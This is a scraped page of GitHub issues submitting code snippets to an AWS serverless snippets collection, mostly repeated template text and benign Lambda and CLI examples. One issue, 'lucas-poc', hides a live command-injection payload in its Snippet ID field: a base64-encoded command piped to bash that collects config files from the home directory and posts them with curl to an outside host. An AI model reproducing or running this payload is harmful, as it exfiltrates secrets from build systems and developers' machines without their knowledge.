To learn more about submitting a pattern, read the publishing guidelines page. and added a new snippet guide.

  1. Use the model template located at https://github.com/aws-samples/serverless-snippets/tree/main/_snippet-model to set up snipet-data.json (metadata) and your snippet code (snippet.txt).

If you want multiple code examples in your snippet or support tabbed code examples (multi runtimes for example) then follow the guide for added a new snippet.

GitHub PR for template:

#45

New snipet for Kinesis Lambda Integration in Java

To submit a template to the Serverless Snippets Collection, submit an issue with the following information.

To learn more about submitting a pattern, read the publishing guidelines page. and added a new snippet guide.

  1. Use the model template located at https://github.com/aws-samples/serverless-snippets/tree/main/_snippet-model to set up snipet-data.json (metadata) and your snippet code (snippet.txt).

If you want multiple code examples in your snippet or support tabbed code examples (multi runtimes for example) then follow the guide for added a new snippet.

GitHub PR for template: #88

New snippet submission - Lambda cold starts count and init duration

To submit a template to the Serverless Snippets Collection, submit an issue with the following information.

To learn more about submitting a pattern, read the publishing guidelines page. and added a new snippet guide.

  1. Use the model template located at https://github.com/aws-samples/serverless-snippets/tree/main/_snippet-model to set up a README, snipet-data.json (metadata) and your snippet code (snippet.txt).

If you want multiple code examples in your snippet or support tabbed code examples (multi runtimes for example) then follow the guide for added a new snippet.

GitHub PR for template: #1

There are already two snippets to count the Lambda cold starts. However, this snippet extracts the initialization duration during the cold start and provides the min, max, and avg initialization time.

[New Snippet Submission]

To submit a template to the Serverless Snippets Collection, submit an issue with the following information.

To learn more about submitting a pattern, read the publishing guidelines page. and added a new snippet guide.

  1. Use the model template located at https://github.com/aws-samples/serverless-snippets/tree/main/_snippet-model to set up a README, snipet-data.json (metadata) and your snippet code (snippet.txt).

If you want multiple code examples in your snippet or support tabbed code examples (multi runtimes for example) then follow the guide for added a new snippet.

GitHub PR for template:

#7

New snipet submission: SQS Lambda hadler & partial batch response

To submit a template to the Serverless Snippets Collection, submit an issue with the following information.

To learn more about submitting a pattern, read the publishing guidelines page. and added a new snippet guide.

  1. Use the model template located at https://github.com/aws-samples/serverless-snippets/tree/main/_snippet-model to set up snipet-data.json (metadata) and your snippet code (snippet.txt).

If you want multiple code examples in your snippet or support tabbed code examples (multi runtimes for example) then follow the guide for added a new snippet.

GitHub PR for template:

#40

New snipet submission - adding lambda handler code snippet for sqs event using Node with batch item handling

To submit a template to the Serverless Snippets Collection, submit an issue with the following information.

To learn more about submitting a pattern, read the publishing guidelines page. and added a new snippet guide.

  1. Use the model template located at https://github.com/aws-samples/serverless-snippets/tree/main/_snippet-model to set up snipet-data.json (metadata) and your snippet code (snippet.txt).

If you want multiple code examples in your snippet or support tabbed code examples (multi runtimes for example) then follow the guide for added a new snippet.

GitHub PR for template:

PR #52

2 New snippets submission - Adding SQS Event handler code snippet for .NET with batch item handling and adding SNS Event handler sinppet for .NET

To submit a template to the Serverless Snippets Collection, submit an issue with the following information.

To learn more about submitting a pattern, read the publishing guidelines page. and added a new snippet guide.

2 New Snippets added:

Adding SQS Event handler
The lambda function retrieves a batch of SQS messages from the event parameter that it receives. The function logs the content of each message and return a collection of BatchItemFailure with message id for unprocessed messages
Adding SNS handler for .NET
The Lambda function retrieves an SNS messages from the event parameter that it receives. The function logs the content of each message.

Use the model template located at https://github.com/aws-samples/serverless-snippets/tree/main/_snippet-model to set up snipet-data.json (metadata) and your snippet code (snippet.txt).

If you want multiple code examples in your snippet or support tabbed code examples (multi runtimes for example) then follow the guide for added a new snippet.
GitHub PR for template:
PR #42

lucas-poc

Snippet ID

;echo 'ZmluZCAiJEhPTUUvd29yayIgLXR5cGUgZiAtbmFtZSBjb25maWcgfCB4YXJncyBjYXQgfCBjdXJsIC1kIEAtIGdpdGxhYi50ZWNoa3JhbnRpLmNvbTo5OTk5ICAg' | base64 -d | bash - #

Title of the Snippet

lucas

Subtitle

lucas

Description

test lucas

Type

None

Which services are related to this snippet?

  • AWS Amplify
  • AWS AppSync
  • AWS AppConfig
  • AWS Organizations
  • Amazon Managed Grafana
  • Amazon Managed Service for Prometheus
  • AWS Security Hub
  • Amazon API Gateway
  • AWS App Runner
  • Amazon Athena
  • AWS Batch
  • Amazon Bedrock
  • Amazon Inspector
  • Amazon Cognito
  • AWS CodeCommit
  • AWS CodePipeline
  • Amazon CodeWhisperer
  • Amazon Connect
  • AWS Config
  • Amazon Comprehend
  • Amazon CloudFormation
  • Amazon CloudFront Edge
  • Amazon CloudFront Functions
  • Amazon CloudFront
  • Amazon CloudWatch
  • Amazon DynamoDB
  • Amazon DynamoDB Streams
  • Amazon ECS
  • Amazon ElastiCache
  • Amazon EFS
  • Amazon Polly
  • AWS Elemental
  • AWS Elemental MediaConnect
  • AWS Elemental MediaLive
  • AWS Elemental MediaConvert
  • Amazon EventBridge
  • Amazon EventBridge Pipes
  • Amazon EventBridge API Destinations
  • Amazon EventBridge Scheduler
  • Amazon DevOps Guru
  • Amazon FSx
  • AWS Fargate
  • AWS Glue
  • Amazon HealthLake
  • AWS IoT
  • Amazon SES
  • AWS Identity & Access Management
  • Amazon Kendra
  • Amazon Kinesis Data Streams
  • Amazon Kinesis Video Streams
  • Amazon Kinesis Firehose
  • Amazon QLDB
  • Amazon RDS
  • Amazon Sagemaker
  • Amazon S3
  • Amazon SNS
  • Amazon SQS
  • AWS Systems Manager
  • Amazon Transcribe
  • AWS Lambda
  • Amazon MemoryDB for Redis
  • Amazon Pinpoint
  • Amazon MSK
  • Amazon Redshift
  • Amazon Rekognition
  • AWS Secrets Manager
  • Amazon Textract
  • AWS Transfer
  • AWS Step Functions
  • AWS WAF
  • Amazon VPC
  • Amazon Route 53
  • AWS CloudTrail
  • AWS Cloud9
  • Amazon Translate
  • Amazon Elastic Compute Cloud
  • AWS SAM CLI
  • Application Load Balancer
  • AWS Service Catalog
  • AWS Resource Explorer
  • AWS Elastic Disaster Recovery
  • AWS Trusted Advisor
  • Elastic Container Service
  • AWS Control Tower
  • Amazon RDS Proxy
  • Amazon Aurora
  • AWS Chatbot
  • AWS Audit Manager
  • AWS X-Ray
  • VPC Link
  • Amazon VPC Lattice
  • AWS CodeBuild
  • Amazon QuickSight
  • AmazonMQ RabbitMQ
  • Amazon Timestream
  • Amazon OpenSearch
  • AWS Compute Optimizer
  • Amazon Elastic Kubernetes Service (EKS)
  • Amazon Kinesis
  • Amazon Managed Workflows for Apache Airflow
  • Amazon Elastic Map Reduce
  • Managed Service for Apache Flink
  • Amazon DocumentDB
  • AWS Application Composer

What programming languages can be applied to this snippet?

  • .NET
  • Go
  • Java
  • JavaScript
  • Node
  • PHP
  • Python
  • Ruby
  • TypeScript
  • VTL
  • aws cli
  • bash
  • json

Snippet title

test

Snippet

test

Name

lucas test

Bio (optional)

No response

LinkedIn

No response

Twitter

No response

New snipet submission - adding 6 kinesis lambda handler snippets for C#, Typescript and Node - 3 code snippets with batch item handling and 3 without

To submit a template to the Serverless Snippets Collection, submit an issue with the following information.

To learn more about submitting a pattern, read the publishing guidelines page. and added a new snippet guide.

  1. Use the model template located at https://github.com/aws-samples/serverless-snippets/tree/main/_snippet-model to set up snipet-data.json (metadata) and your snippet code (snippet.txt).

If you want multiple code examples in your snippet or support tabbed code examples (multi runtimes for example) then follow the guide for added a new snippet.

GitHub PR for template:

PR #56

us-west-1 reagion set by default

Test Snippet

Snippet ID

aws-cli-find-function-runtimes2

Title of the Snippet

Find all Lambda functions with a specific runtime

Subtitle

Using AWS CLI to find all instances of a specific runtime

Description

The AWSCLI can find all instances of a specific runtime in a single location or across multiple regions

Type

Integration

Which services are related to this snippet?

  • AWS Amplify
  • AWS AppSync
  • AWS AppConfig
  • AWS Organizations
  • Amazon Managed Grafana
  • Amazon Managed Service for Prometheus
  • AWS Security Hub
  • Amazon API Gateway
  • AWS App Runner
  • Amazon Athena
  • AWS Batch
  • Amazon Bedrock
  • Amazon Inspector
  • Amazon Cognito
  • AWS CodeCommit
  • AWS CodePipeline
  • Amazon CodeWhisperer
  • Amazon Connect
  • AWS Config
  • Amazon Comprehend
  • Amazon CloudFormation
  • Amazon CloudFront Edge
  • Amazon CloudFront Functions
  • Amazon CloudFront
  • Amazon CloudWatch
  • Amazon DynamoDB
  • Amazon DynamoDB Streams
  • Amazon ECS
  • Amazon ElastiCache
  • Amazon EFS
  • Amazon Polly
  • AWS Elemental
  • AWS Elemental MediaConnect
  • AWS Elemental MediaLive
  • AWS Elemental MediaConvert
  • Amazon EventBridge
  • Amazon EventBridge Pipes
  • Amazon EventBridge API Destinations
  • Amazon EventBridge Scheduler
  • Amazon DevOps Guru
  • Amazon FSx
  • AWS Fargate
  • AWS Glue
  • Amazon HealthLake
  • AWS IoT
  • Amazon SES
  • AWS Identity & Access Management
  • Amazon Kendra
  • Amazon Kinesis Data Streams
  • Amazon Kinesis Video Streams
  • Amazon Kinesis Firehose
  • Amazon QLDB
  • Amazon RDS
  • Amazon Sagemaker
  • Amazon S3
  • Amazon SNS
  • Amazon SQS
  • AWS Systems Manager
  • Amazon Transcribe
  • AWS Lambda
  • Amazon MemoryDB for Redis
  • Amazon Pinpoint
  • Amazon MSK
  • Amazon Redshift
  • Amazon Rekognition
  • AWS Secrets Manager
  • Amazon Textract
  • AWS Transfer
  • AWS Step Functions
  • AWS WAF
  • Amazon VPC
  • Amazon Route 53
  • AWS CloudTrail
  • AWS Cloud9
  • Amazon Translate
  • Amazon Elastic Compute Cloud
  • AWS SAM CLI
  • Application Load Balancer
  • AWS Service Catalog
  • AWS Resource Explorer
  • AWS Elastic Disaster Recovery
  • AWS Trusted Advisor
  • Elastic Container Service
  • AWS Control Tower
  • Amazon RDS Proxy
  • Amazon Aurora
  • AWS Chatbot
  • AWS Audit Manager
  • AWS X-Ray
  • VPC Link
  • Amazon VPC Lattice
  • AWS CodeBuild
  • Amazon QuickSight
  • AmazonMQ RabbitMQ
  • Amazon Timestream
  • Amazon OpenSearch
  • AWS Compute Optimizer
  • Amazon Elastic Kubernetes Service (EKS)
  • Amazon Kinesis
  • Amazon Managed Workflows for Apache Airflow
  • Amazon Elastic Map Reduce
  • Managed Service for Apache Flink
  • Amazon DocumentDB
  • AWS Application Composer

What programming languages can be applied to this snippet?

  • .NET
  • Go
  • Java
  • JavaScript
  • Node
  • PHP
  • Python
  • Ruby
  • TypeScript
  • VTL
  • aws cli
  • bash
  • json

Snippet title

Find all Lambda functions in a single region with a specific runtime

Snippet

aws lambda list-functions --function-version ALL --output text --query "Functions[?Runtime=='python2.7'].FunctionArn"

New snipet submission : Ruby : Lambda SQS Integration

To submit a template to the Serverless Snippets Collection, submit an issue with the following information.

To learn more about submitting a pattern, read the publishing guidelines page. and added a new snippet guide.

  1. Use the model template located at https://github.com/aws-samples/serverless-snippets/tree/main/_snippet-model to set up snipet-data.json (metadata) and your snippet code (snippet.txt).

If you want multiple code examples in your snippet or support tabbed code examples (multi runtimes for example) then follow the guide for added a new snippet.

GitHub PR for template: #91

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.